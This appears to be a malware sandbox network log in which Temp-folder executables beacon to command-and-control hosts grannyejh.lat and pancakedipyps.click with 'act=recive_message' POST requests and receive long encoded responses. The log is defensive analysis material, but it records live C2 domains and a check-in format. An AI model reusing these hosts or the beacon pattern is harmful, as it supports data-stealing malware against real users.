                                                                                                                                                                  2024-12-18 10:09:29 UTC1043INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Wed, 18 Dec 2024 10:09:29 GMT
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Set-Cookie: PHPSESSID=v1h4cbnotfu4k487v90fd719r1; expires=Sun, 13-Apr-2025 03:56:04 GMT; Max-Age=9999999; path=/
                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vwmLD0riqqAtAl31hE7N90ovKhKftMGqZuwqzLgWw4SvBGh%2BbmEaBXnb2Q%2F%2FkmCU9gGoz8zmLYKNyl%2FYX%2F8KGWDo1MSOs7ZJMeOMWWvv8hFDgupWxUmjE9tpxb3BJJ7iDDpuo%2FT9"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 8f3e5b7478e94234-EWR
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1863&min_rtt=1858&rtt_var=700&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=910&delivery_rate=1571582&cwnd=171&unsent_bytes=0&cid=b822422941862f34&ts=4671&x=0"
                                                                                                                                                                  2024-12-18 10:09:29 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                  Data Ascii: 2ok
                                                                                                                                                                  2024-12-18 10:09:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  2192.168.2.649919172.67.179.109443340C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2024-12-18 10:09:27 UTC261OUTPOST /api HTTP/1.1
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                  Content-Length: 52
                                                                                                                                                                  Host: grannyejh.lat
                                                                                                                                                                  2024-12-18 10:09:27 UTC52OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 36 39 38 39 37 38 33 33 37 30 26 6a 3d
                                                                                                                                                                  Data Ascii: act=recive_message&ver=4.0&lid=yau6Na--6989783370&j=
                                                                                                                                                                  2024-12-18 10:09:41 UTC1032INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Wed, 18 Dec 2024 10:09:41 GMT
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Set-Cookie: PHPSESSID=cdu0tjrrc329tc6s6ull4q5sce; expires=Sun, 13-Apr-2025 03:56:08 GMT; Max-Age=9999999; path=/
                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2EpR1%2FKZsy095w2KED%2F1i1yeUsdTG1DIAYaffrSFPwPYG5wW%2Bn0azGTYqecJsG6vA4pLCHbAmOCCaGRNAIggRIQDPDmhit1WOIQEdGA0x%2FUc4txj1Mkw7LAGJprDRkQE"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 8f3e5b853a418cec-EWR
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1818&min_rtt=1818&rtt_var=683&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=949&delivery_rate=1601755&cwnd=209&unsent_bytes=0&cid=8bdc7538d8b6ba40&ts=13627&x=0"
                                                                                                                                                                  2024-12-18 10:09:41 UTC337INData Raw: 31 64 32 30 0d 0a 67 77 47 5a 39 56 6e 52 32 31 4d 6f 52 66 52 71 79 43 38 67 32 69 36 2f 62 66 46 32 56 46 67 31 78 45 53 6e 33 4b 4a 72 4e 57 2f 34 49 2b 2f 58 59 2b 58 33 63 56 73 67 31 6c 43 38 58 56 57 2f 41 70 30 4d 6c 56 52 75 50 6c 53 6f 4e 38 4c 77 67 42 31 59 54 62 6c 6e 2b 4a 6b 71 74 50 64 78 54 54 33 57 55 4a 4e 55 41 72 39 41 6e 56 66 54 45 7a 34 36 56 4b 67 6d 78 72 66 4e 47 31 6b 4d 36 32 33 2b 6e 54 79 79 76 7a 4a 45 4b 4a 45 50 72 55 35 4b 74 45 66 53 42 5a 78 55 65 48 70 51 76 6d 61 64 2f 75 38 4f 51 51 37 4f 59 4f 71 65 65 36 7a 33 4b 41 6f 67 6d 6b 6a 79 44 55 47 2f 54 4e 4d 4c 6c 52 30 38 4d 46 32 67 4a 38 4f 32 30 67 4a 54 42 2b 74 6a 2f 5a 77 32 75 36 73 2f 54 69 2b 61 43 61 64 4f 41 76 59 4d 32 68 66 54 54 48 5a 70 5a 61 55 33 31
                                                                                                                                                                  Data Ascii: 1d20gwGZ9VnR21MoRfRqyC8g2i6/bfF2VFg1xESn3KJrNW/4I+/XY+X3cVsg1lC8XVW/Ap0MlVRuPlSoN8LwgB1YTbln+JkqtPdxTT3WUJNUAr9AnVfTEz46VKgmxrfNG1kM623+nTyyvzJEKJEPrU5KtEfSBZxUeHpQvmad/u8OQQ7OYOqee6z3KAogmkjyDUG/TNMLlR08MF2gJ8O20gJTB+tj/Zw2u6s/Ti+aCadOAvYM2hfTTHZpZaU31
                                                                                                                                                                  2024-12-18 10:09:41 UTC1369INData Raw: 6d 4f 59 75 6e 67 41 35 62 54 62 6b 6a 2f 5a 6b 36 76 72 6b 6a 51 69 79 64 44 62 68 47 53 37 56 42 33 51 4b 5a 47 7a 55 36 55 4b 77 73 79 72 54 45 42 46 6f 4c 34 57 4f 37 32 58 75 30 6f 58 45 53 5a 37 55 4e 75 6b 70 4f 72 67 37 6e 54 34 78 61 4c 33 70 51 71 6d 61 64 2f 73 67 4d 56 41 37 71 62 50 69 66 4d 4b 47 35 49 30 77 71 6b 78 71 73 53 45 79 79 54 38 38 46 6e 52 49 31 4d 31 79 76 49 38 4b 36 67 45 63 58 43 76 6b 6a 6f 39 63 61 76 72 49 39 51 44 43 57 53 4c 55 44 57 2f 68 4c 30 55 2f 4c 56 44 49 37 55 36 63 69 79 37 44 45 42 56 45 44 37 47 7a 39 6e 54 75 30 73 7a 6c 43 4a 70 73 44 70 55 31 48 74 55 6a 62 41 35 49 52 64 6e 51 58 6f 54 36 46 35 6f 41 6e 55 41 37 7a 49 63 36 55 4e 62 32 2b 4a 77 6f 34 32 42 48 71 53 6b 37 34 46 4a 30 42 6c 68 73 6b 4f 30
                                                                                                                                                                  Data Ascii: mOYungA5bTbkj/Zk6vrkjQiydDbhGS7VB3QKZGzU6UKwsyrTEBFoL4WO72Xu0oXESZ7UNukpOrg7nT4xaL3pQqmad/sgMVA7qbPifMKG5I0wqkxqsSEyyT88FnRI1M1yvI8K6gEcXCvkjo9cavrI9QDCWSLUDW/hL0U/LVDI7U6ciy7DEBVED7Gz9nTu0szlCJpsDpU1HtUjbA5IRdnQXoT6F5oAnUA7zIc6UNb2+Jwo42BHqSk74FJ0BlhskO0
                                                                                                                                                                  2024-12-18 10:09:41 UTC1369INData Raw: 2f 70 68 4a 5a 68 72 71 49 63 36 55 4e 62 32 2b 4a 77 6f 34 32 42 48 71 53 6b 37 34 46 4a 30 43 6d 78 45 7a 4e 56 61 73 4b 4d 43 30 7a 41 46 5a 44 76 4e 73 2f 35 63 33 75 37 4d 38 52 43 4f 65 41 61 46 47 52 4c 68 4e 31 30 2f 64 56 44 45 69 46 2f 35 6d 38 62 6e 4d 42 46 68 50 31 47 44 31 6d 54 79 6c 2b 53 34 45 50 74 59 50 70 67 30 61 2b 45 44 55 44 35 67 65 4d 6a 70 51 71 79 50 47 75 63 4d 45 55 41 66 76 5a 50 2b 62 4d 72 36 2f 4d 55 30 6a 6b 78 71 76 52 45 36 30 44 4a 4e 50 6c 41 78 32 59 68 65 4a 49 64 4f 39 37 77 70 47 42 4b 46 38 74 59 35 37 74 4c 56 78 45 6d 65 52 44 61 4a 47 52 4c 42 4d 7a 77 71 64 48 7a 63 77 55 61 63 72 79 62 6a 41 43 46 63 4c 37 57 50 38 6b 43 6d 68 76 44 64 59 4c 64 5a 47 36 6b 70 61 2b 42 53 64 4f 59 4d 44 4a 79 77 56 6b 79 58
                                                                                                                                                                  Data Ascii: /phJZhrqIc6UNb2+Jwo42BHqSk74FJ0CmxEzNVasKMC0zAFZDvNs/5c3u7M8RCOeAaFGRLhN10/dVDEiF/5m8bnMBFhP1GD1mTyl+S4EPtYPpg0a+EDUD5geMjpQqyPGucMEUAfvZP+bMr6/MU0jkxqvRE60DJNPlAx2YheJIdO97wpGBKF8tY57tLVxEmeRDaJGRLBMzwqdHzcwUacrybjACFcL7WP8kCmhvDdYLdZG6kpa+BSdOYMDJywVkyX
                                                                                                                                                                  2024-12-18 10:09:41 UTC1369INData Raw: 6c 67 4a 37 32 58 39 6d 6a 36 38 73 79 4e 43 4b 5a 73 44 70 55 5a 51 75 45 48 5a 41 35 63 63 50 54 41 58 36 47 62 43 70 6f 42 52 46 7a 6a 73 62 50 75 55 4c 66 4f 6d 66 31 4e 6e 6b 51 54 71 46 51 4b 30 51 74 30 41 6e 78 67 39 4d 6c 61 71 4b 4d 4b 37 79 51 46 66 48 2b 42 6e 38 35 59 31 76 4c 67 31 54 79 4b 53 44 36 35 4c 54 66 67 43 6e 51 69 4c 56 47 35 36 65 49 45 54 68 35 2f 36 53 55 68 44 2b 43 50 38 6d 33 76 72 2b 54 31 4a 4b 35 34 48 72 45 52 4f 73 6b 58 57 41 35 67 51 4f 6a 4e 53 6f 43 66 41 75 38 45 4e 57 77 66 6e 59 50 69 59 4e 4c 79 78 63 51 52 6e 6b 52 44 71 46 51 4b 64 57 39 59 42 6c 56 51 70 64 45 37 6d 49 63 6e 2b 6d 45 6c 62 42 4f 64 6c 2f 70 73 36 74 62 45 30 51 69 4f 58 44 71 78 4f 54 62 78 4a 33 41 43 58 47 44 67 77 56 71 63 71 7a 72 48 4c
                                                                                                                                                                  Data Ascii: lgJ72X9mj68syNCKZsDpUZQuEHZA5ccPTAX6GbCpoBRFzjsbPuULfOmf1NnkQTqFQK0Qt0Anxg9MlaqKMK7yQFfH+Bn85Y1vLg1TyKSD65LTfgCnQiLVG56eIETh5/6SUhD+CP8m3vr+T1JK54HrEROskXWA5gQOjNSoCfAu8ENWwfnYPiYNLyxcQRnkRDqFQKdW9YBlVQpdE7mIcn+mElbBOdl/ps6tbE0QiOXDqxOTbxJ3ACXGDgwVqcqzrHL
                                                                                                                                                                  2024-12-18 10:09:41 UTC1369INData Raw: 5a 76 2f 5a 67 39 73 72 77 37 52 69 43 54 41 36 56 42 41 76 59 4d 32 68 66 54 54 48 59 55 58 4c 55 78 78 72 44 4c 48 30 78 4e 2f 69 33 69 31 7a 79 2f 2b 57 6b 4b 4a 4a 30 44 72 6b 31 4f 75 45 6a 51 44 34 45 62 4d 54 31 65 72 54 54 50 75 63 63 43 58 77 62 75 5a 65 6d 62 4e 61 47 38 49 31 68 6e 32 45 69 74 56 51 4c 67 44 4f 73 49 67 77 51 31 65 47 61 77 4a 64 4f 31 7a 51 55 58 45 71 39 36 75 35 41 33 38 2b 46 78 54 43 69 66 43 36 56 4d 53 37 52 42 32 41 61 57 46 54 41 2b 58 61 77 6d 77 37 6a 42 44 46 30 4f 34 47 6e 79 6b 44 4f 30 75 69 4d 4b 61 64 59 50 73 67 30 61 2b 47 58 61 48 5a 30 45 64 69 55 5a 76 32 62 43 73 6f 42 52 46 77 6e 72 62 50 2b 51 4e 37 57 38 4e 30 63 6d 6d 51 6d 71 51 6b 61 7a 52 64 73 4f 6e 68 45 37 50 6b 57 73 4c 63 71 79 79 51 56 61 54
                                                                                                                                                                  Data Ascii: Zv/Zg9srw7RiCTA6VBAvYM2hfTTHYUXLUxxrDLH0xN/i3i1zy/+WkKJJ0Drk1OuEjQD4EbMT1erTTPuccCXwbuZembNaG8I1hn2EitVQLgDOsIgwQ1eGawJdO1zQUXEq96u5A38+FxTCifC6VMS7RB2AaWFTA+Xawmw7jBDF0O4GnykDO0uiMKadYPsg0a+GXaHZ0EdiUZv2bCsoBRFwnrbP+QN7W8N0cmmQmqQkazRdsOnhE7PkWsLcqyyQVaT
                                                                                                                                                                  2024-12-18 10:09:41 UTC1369INData Raw: 55 4e 4c 43 72 4d 45 77 31 6c 67 57 67 58 30 69 7a 53 64 41 43 6e 68 63 77 50 46 79 71 4e 4d 79 2b 77 77 49 58 51 36 46 6b 34 39 64 6a 38 35 6f 6d 58 43 32 52 42 4c 78 47 51 37 74 61 30 42 2f 54 57 6e 59 72 55 4c 64 6d 6e 61 6a 51 48 6c 41 53 72 33 71 37 6b 44 66 7a 34 58 46 4d 4c 70 41 50 72 45 4e 51 76 55 72 53 41 4a 6f 64 4d 6a 4a 55 70 69 4c 42 75 63 55 4b 57 77 62 6d 59 50 53 54 4d 72 32 77 50 67 70 70 31 67 2b 79 44 52 72 34 62 63 59 4d 6e 78 6c 32 4a 52 6d 2f 5a 73 4b 79 67 46 45 58 41 65 39 6d 2b 35 30 39 74 37 77 33 51 43 4b 57 41 36 6c 43 52 72 35 49 30 67 2b 59 48 54 63 38 55 71 77 74 77 37 50 44 44 31 46 4e 72 79 50 38 6a 33 76 72 2b 52 46 52 4b 70 6f 50 36 6c 49 4d 6f 51 7a 61 41 39 4e 4d 64 6a 46 62 6f 69 48 46 73 38 4d 42 55 67 6e 72 5a 76
                                                                                                                                                                  Data Ascii: UNLCrMEw1lgWgX0izSdACnhcwPFyqNMy+wwIXQ6Fk49dj85omXC2RBLxGQ7ta0B/TWnYrULdmnajQHlASr3q7kDfz4XFMLpAPrENQvUrSAJodMjJUpiLBucUKWwbmYPSTMr2wPgpp1g+yDRr4bcYMnxl2JRm/ZsKygFEXAe9m+509t7w3QCKWA6lCRr5I0g+YHTc8Uqwtw7PDD1FNryP8j3vr+RFRKpoP6lIMoQzaA9NMdjFboiHFs8MBUgnrZv
                                                                                                                                                                  2024-12-18 10:09:41 UTC282INData Raw: 71 44 67 4b 61 64 59 50 76 41 30 61 2b 48 4b 64 48 5a 41 45 4e 54 56 47 6d 47 61 64 70 2f 35 4a 58 42 76 6d 63 2f 69 42 4d 4c 36 31 49 48 52 6e 7a 6c 7a 34 48 78 44 71 48 73 4a 50 6a 43 74 34 65 6c 62 6d 66 76 79 6e 67 42 38 58 56 62 4d 74 75 34 56 37 36 2f 6c 32 53 54 57 45 44 71 6c 62 51 66 39 79 34 79 69 46 48 6a 45 71 55 4c 45 70 68 66 43 41 42 68 64 56 32 43 50 79 6b 43 43 69 72 7a 78 61 49 4e 59 33 35 41 31 61 2b 42 53 64 4f 70 41 61 4f 44 31 42 74 32 76 69 71 4d 6f 4f 52 77 72 32 62 4c 76 5a 65 37 58 35 61 52 6c 70 31 67 79 37 44 52 72 6f 48 6f 5a 61 77 45 4e 6d 61 45 6a 6f 50 34 57 6f 67 46 45 46 51 36 46 78 75 38 39 37 39 4c 6f 6a 57 43 47 56 48 71 6b 4b 66 49 5a 72 78 77 4b 56 41 79 63 45 61 61 45 38 79 4c 6a 58 47 42 73 59 34 6d 33 31 6b 43 33
                                                                                                                                                                  Data Ascii: qDgKadYPvA0a+HKdHZAENTVGmGadp/5JXBvmc/iBML61IHRnzlz4HxDqHsJPjCt4elbmfvyngB8XVbMtu4V76/l2STWEDqlbQf9y4yiFHjEqULEphfCABhdV2CPykCCirzxaINY35A1a+BSdOpAaOD1Bt2viqMoORwr2bLvZe7X5aRlp1gy7DRroHoZawENmaEjoP4WogFEFQ6Fxu8979LojWCGVHqkKfIZrxwKVAycEaaE8yLjXGBsY4m31kC3
                                                                                                                                                                  2024-12-18 10:09:41 UTC1369INData Raw: 32 62 66 63 0d 0a 71 43 6a 43 71 4e 46 45 63 42 66 73 5a 65 79 47 65 2f 33 35 4e 77 70 2f 78 6b 62 71 53 56 50 34 46 49 31 64 79 45 46 6c 62 51 66 30 4f 59 75 6e 67 42 38 58 56 62 4d 74 75 34 56 37 36 2f 6c 32 53 54 57 45 44 71 6c 62 51 66 39 79 34 79 47 55 45 6a 4d 39 52 2b 51 49 7a 71 72 48 53 52 6c 4e 37 69 4f 6a 72 6e 76 37 2b 51 34 45 5a 34 35 49 38 67 31 33 75 30 4c 54 43 49 55 46 65 78 52 51 6f 43 50 43 72 6f 49 6e 58 42 6e 6d 49 37 58 58 50 66 50 68 59 51 52 6e 6b 68 6e 71 46 52 4c 71 46 34 68 63 78 45 52 6b 4a 52 6d 2f 5a 74 50 2b 6d 46 73 5a 54 66 4d 6a 6f 39 64 38 73 4b 73 6a 54 43 53 41 43 2b 31 7a 66 4c 74 61 30 41 43 59 46 51 67 45 65 61 73 6e 78 72 43 43 4f 45 45 41 38 57 44 2b 6b 41 57 4e 74 7a 5a 65 49 4a 67 4f 71 67 30 4d 2b 45 4f 64 56
                                                                                                                                                                  Data Ascii: 2bfcqCjCqNFEcBfsZeyGe/35Nwp/xkbqSVP4FI1dyEFlbQf0OYungB8XVbMtu4V76/l2STWEDqlbQf9y4yGUEjM9R+QIzqrHSRlN7iOjrnv7+Q4EZ45I8g13u0LTCIUFexRQoCPCroInXBnmI7XXPfPhYQRnkhnqFRLqF4hcxERkJRm/ZtP+mFsZTfMjo9d8sKsjTCSAC+1zfLta0ACYFQgEeasnxrCCOEEA8WD+kAWNtzZeIJgOqg0M+EOdV
                                                                                                                                                                  2024-12-18 10:09:41 UTC1369INData Raw: 2b 52 75 5a 2b 6c 65 79 62 58 41 52 61 73 54 48 6b 32 53 4c 7a 72 33 45 53 64 64 68 49 75 41 30 61 2b 41 76 65 48 59 45 53 4e 53 78 55 34 52 6a 37 6d 63 34 4f 56 68 76 78 62 76 65 32 4f 4b 4b 7a 44 33 51 79 6c 51 61 6b 53 6c 53 70 44 4a 4e 50 6e 46 52 75 41 78 66 75 5a 76 72 77 67 42 45 58 56 61 46 57 2b 4a 6b 31 74 4b 38 67 42 77 43 59 44 36 74 62 55 72 56 41 2f 41 79 43 48 6e 5a 30 46 36 42 6d 6e 65 79 4f 53 56 4d 63 6f 54 75 72 78 57 44 6d 36 6d 59 61 64 59 6c 47 73 77 31 55 2b 42 53 50 51 64 4d 47 64 6d 49 58 34 53 58 58 72 4d 59 4b 51 51 36 6d 58 63 57 79 4c 4c 43 70 4e 30 6b 5a 71 43 4f 6d 53 30 57 69 53 39 73 70 73 31 52 34 65 6c 6a 6d 66 76 7a 2b 69 45 6c 6f 51 36 46 37 75 38 39 37 68 72 6f 2f 52 43 43 41 47 65 64 6f 56 62 74 63 32 77 7a 54 57 6e
                                                                                                                                                                  Data Ascii: +RuZ+leybXARasTHk2SLzr3ESddhIuA0a+AveHYESNSxU4Rj7mc4OVhvxbve2OKKzD3QylQakSlSpDJNPnFRuAxfuZvrwgBEXVaFW+Jk1tK8gBwCYD6tbUrVA/AyCHnZ0F6BmneyOSVMcoTurxWDm6mYadYlGsw1U+BSPQdMGdmIX4SXXrMYKQQ6mXcWyLLCpN0kZqCOmS0WiS9sps1R4eljmfvz+iEloQ6F7u897hro/RCCAGedoVbtc2wzTWn


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  3192.168.2.649929104.21.23.764434196C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2024-12-18 10:09:30 UTC267OUTPOST /api HTTP/1.1
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                  Content-Length: 46
                                                                                                                                                                  Host: pancakedipyps.click
                                                                                                                                                                  2024-12-18 10:09:30 UTC46OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 46 41 54 45 39 39 2d 2d 74 65 73 74 26 6a 3d
                                                                                                                                                                  Data Ascii: act=recive_message&ver=4.0&lid=FATE99--test&j=
                                                                                                                                                                  2024-12-18 10:09:44 UTC1040INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Wed, 18 Dec 2024 10:09:44 GMT
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Set-Cookie: PHPSESSID=cedmggrqoogdbqgfu0e9601938; expires=Sun, 13-Apr-2025 03:56:14 GMT; Max-Age=9999999; path=/
                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aw%2FHIjyMgElEk2yfskoFChCh6VKva1JASSf44X%2B5wUKrdTss0p1QK1L5puk3p19Y0l2YllHGVFBPU0eqAfESrg1F8p0XyXU63YQh%2BfP6HxejScjLRj3%2BB5uHoh2NnWiZyslzFR3E"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 8f3e5b993b9e4379-EWR
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1709&min_rtt=1706&rtt_var=646&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=949&delivery_rate=1683967&cwnd=194&unsent_bytes=0&cid=b076f794e850a587&ts=13563&x=0"
                                                                                                                                                                  2024-12-18 10:09:44 UTC329INData Raw: 31 64 32 30 0d 0a 56 6a 73 37 43 65 33 4d 58 46 36 6d 69 58 43 36 47 54 76 66 58 6e 78 49 65 6c 31 4a 77 63 6d 59 6c 31 6e 67 52 4c 45 4f 76 32 41 74 47 55 30 72 31 2f 68 77 66 4e 58 73 55 6f 42 74 53 61 6f 37 55 47 6f 62 4f 57 76 37 72 2f 6e 37 4b 6f 56 6f 6b 33 6a 53 51 6d 78 64 57 6d 57 65 71 58 42 38 77 2f 46 53 67 45 4a 41 2f 54 73 53 61 6b 42 2f 4c 4b 75 72 2b 66 73 37 67 53 2f 65 66 74 4d 44 50 6c 64 63 59 59 69 76 4f 44 2f 4b 35 42 58 66 66 46 71 31 4d 42 55 6c 45 6a 42 72 37 65 76 39 37 58 76 61 5a 76 78 72 79 77 45 62 57 6b 68 69 7a 37 46 77 4a 59 54 73 48 70 67 6a 47 62 34 37 48 69 51 63 4f 53 4b 70 6f 66 44 7a 4f 6f 51 75 77 57 66 5a 43 44 35 5a 58 32 43 43 70 69 77 79 77 4f 4d 65 32 58 5a 61 2f 58 4a 65 4c 51 42 2f 63 2b 50 34 79 50 59 71 6b
                                                                                                                                                                  Data Ascii: 1d20Vjs7Ce3MXF6miXC6GTvfXnxIel1JwcmYl1ngRLEOv2AtGU0r1/hwfNXsUoBtSao7UGobOWv7r/n7KoVok3jSQmxdWmWeqXB8w/FSgEJA/TsSakB/LKur+fs7gS/eftMDPldcYYivOD/K5BXffFq1MBUlEjBr7ev97XvaZvxrywEbWkhiz7FwJYTsHpgjGb47HiQcOSKpofDzOoQuwWfZCD5ZX2CCpiwywOMe2XZa/XJeLQB/c+P4yPYqk
                                                                                                                                                                  2024-12-18 10:09:44 UTC1369INData Raw: 49 50 43 69 33 70 75 75 31 4a 4d 77 2f 6b 32 76 52 51 6d 77 5a 58 32 57 4f 6f 7a 34 75 7a 4f 41 5a 33 57 6c 53 74 44 45 54 4b 68 55 31 4a 4b 43 72 2f 66 38 78 6a 53 7a 58 59 64 41 45 4e 46 6b 5a 4a 63 2b 70 4a 6e 79 63 71 7a 48 64 61 31 36 78 4b 6c 77 51 57 43 42 6c 75 75 76 39 2b 58 76 61 5a 74 74 70 33 67 45 2f 56 6c 70 6a 68 4c 77 2b 4c 73 4c 6d 46 38 70 39 58 4c 4d 32 48 54 67 53 4d 53 32 67 6f 76 48 38 50 6f 55 69 6b 79 4b 64 42 53 77 5a 41 53 75 75 6f 7a 55 77 7a 76 77 53 6d 47 51 58 70 48 77 5a 4a 6c 68 6e 61 36 65 71 2f 76 51 2f 6a 43 6a 58 59 4e 73 4d 4f 56 5a 66 59 59 2b 70 4e 44 54 4d 36 68 2f 54 64 46 6d 34 4d 52 6f 73 46 44 34 75 34 2b 57 36 38 69 50 43 66 70 4e 43 32 67 45 6d 47 32 78 6f 67 61 41 35 4b 6f 54 30 58 4d 45 37 58 72 46 38 52 6d
                                                                                                                                                                  Data Ascii: IPCi3puu1JMw/k2vRQmwZX2WOoz4uzOAZ3WlStDETKhU1JKCr/f8xjSzXYdAENFkZJc+pJnycqzHda16xKlwQWCBluuv9+XvaZttp3gE/VlpjhLw+LsLmF8p9XLM2HTgSMS2govH8PoUikyKdBSwZASuuozUwzvwSmGQXpHwZJlhna6eq/vQ/jCjXYNsMOVZfYY+pNDTM6h/TdFm4MRosFD4u4+W68iPCfpNC2gEmG2xogaA5KoT0XME7XrF8Rm
                                                                                                                                                                  2024-12-18 10:09:44 UTC1369INData Raw: 71 65 75 30 74 54 79 61 5a 6f 73 73 37 42 55 2f 47 32 78 6f 67 61 41 35 4b 6f 54 30 58 4d 45 37 58 72 46 38 52 6d 6f 56 4e 79 36 6d 70 50 76 2f 4e 59 63 73 33 32 54 54 41 53 5a 57 58 57 75 44 70 6a 51 78 79 75 38 61 30 58 42 53 75 7a 77 66 49 46 68 78 61 36 53 7a 75 71 31 37 74 69 48 66 59 64 4a 41 41 56 70 58 5a 59 69 34 66 69 4f 4b 38 6c 4c 66 64 78 6e 6c 66 42 49 6a 47 44 51 68 70 36 76 39 2b 44 36 42 49 64 42 68 32 67 67 36 58 6c 31 6e 68 71 4d 34 50 4d 50 76 46 38 70 2b 55 4c 45 77 58 6d 52 59 4f 44 50 6a 38 37 72 61 50 4a 51 6c 2f 47 2f 4d 43 33 52 47 46 33 4c 50 71 54 4a 38 6e 4b 73 56 33 58 4e 53 75 7a 51 65 4f 42 30 78 49 4b 4b 68 2f 50 51 32 6a 69 44 54 62 64 30 45 4f 46 6c 65 62 4a 32 38 4f 7a 72 57 34 56 4b 57 4f 31 36 6c 66 45 5a 71 4c 69 38
                                                                                                                                                                  Data Ascii: qeu0tTyaZoss7BU/G2xogaA5KoT0XME7XrF8RmoVNy6mpPv/NYcs32TTASZWXWuDpjQxyu8a0XBSuzwfIFhxa6Szuq17tiHfYdJAAVpXZYi4fiOK8lLfdxnlfBIjGDQhp6v9+D6BIdBh2gg6Xl1nhqM4PMPvF8p+ULEwXmRYODPj87raPJQl/G/MC3RGF3LPqTJ8nKsV3XNSuzQeOB0xIKKh/PQ2jiDTbd0EOFlebJ28OzrW4VKWO16lfEZqLi8
                                                                                                                                                                  2024-12-18 10:09:44 UTC1369INData Raw: 66 6f 79 6a 53 37 62 59 39 49 47 4f 6c 39 66 5a 6f 71 68 4e 43 37 4d 35 52 2f 54 64 46 4b 76 50 42 4d 75 46 44 73 6a 71 4b 47 36 75 33 75 46 50 70 4d 30 6e 54 63 35 56 6c 6c 6f 6d 65 34 68 63 74 32 72 46 64 51 37 41 66 30 77 45 43 6f 58 4d 79 65 6f 6f 2f 76 35 4e 59 55 6a 32 6d 54 56 45 44 56 64 55 57 71 42 6f 54 38 34 77 65 34 57 33 33 39 66 73 6e 78 51 61 68 38 6e 61 2f 76 72 31 64 49 4f 77 41 66 70 4c 4d 4a 4d 4c 52 6c 65 5a 38 2f 32 66 6a 44 48 35 78 72 58 66 56 43 78 4e 68 63 68 46 44 51 76 72 36 4c 2f 38 7a 71 48 49 39 4a 6f 30 51 67 79 57 6c 70 6b 67 4b 45 32 66 49 71 72 46 63 41 37 41 66 30 5a 43 53 45 57 4f 57 75 38 35 65 4f 31 50 49 35 6d 69 79 7a 52 43 7a 4a 66 58 47 65 4f 71 44 59 35 7a 4f 38 54 33 6e 31 61 73 6a 67 62 4b 78 63 37 4a 36 32 68
